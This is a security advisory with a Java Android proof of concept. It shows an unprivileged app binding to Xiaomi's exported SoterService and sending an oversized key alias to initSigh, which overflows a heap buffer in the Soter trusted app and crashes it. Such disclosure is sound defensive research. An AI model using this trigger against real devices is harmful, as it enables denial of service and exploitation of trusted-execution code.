Information

To start a signing session, the soter trusted app exposes the initSigh function (command ID 0x100C), which takes the business key alias and the challenge strings as arguments. The function builds a session ID by concatenating the alias and the challenge into a fixed-size buffer without checking that either fits. A challenge longer than 0x198 bytes or an alias longer than 0x8C bytes therefore overflows the session buffer and overwrites the heap memory that follows it with attacker-controlled data. An unprivileged Android application can reach initSigh by using com.tencent.soter.soterserver.SoterService as a proxy.

PoC:

import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.ServiceConnection;
import android.os.Bundle;
import android.os.IBinder;
import android.os.RemoteException;
import androidx.appcompat.app.AppCompatActivity; // androidx assumed; the support-library package also works
import java.util.Arrays;

import com.tencent.soter.soterserver.ISoterService;

public class MainActivity extends AppCompatActivity {
    ISoterService stub;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // Bind to the exported SoterService, which proxies calls to the trusted app.
        Intent it = new Intent();
        it.setClassName("com.tencent.soter.soterserver",
            "com.tencent.soter.soterserver.SoterService");
        bindService(it, connection, Context.BIND_AUTO_CREATE);
    }

    protected ServiceConnection connection = new ServiceConnection() {
        // An alias far beyond the 0x8C-byte field overflows the session buffer in the TA.
        void crashTA() throws RemoteException {
            char[] keyalias = new char[0x400];
            Arrays.fill(keyalias, 'A');

            String challenge = "CCCCCCCCCCCCCCC";
            stub.initSigh(0, new String(keyalias), challenge);
        }

        @Override
        public void onServiceConnected(ComponentName componentName, IBinder iBinder) {
            stub = ISoterService.Stub.asInterface(iBinder);
            try {
                crashTA();
            } catch (RemoteException ex) {
            }
        }

        // Required by the ServiceConnection interface; without it the class does not compile.
        @Override
        public void onServiceDisconnected(ComponentName componentName) {
            stub = null;
        }
    };
}
References:
https://trust.mi.com/misrc/bulletins/advisory?cveId=170
https://research.checkpoint.com/2022/researching-xiaomis-tee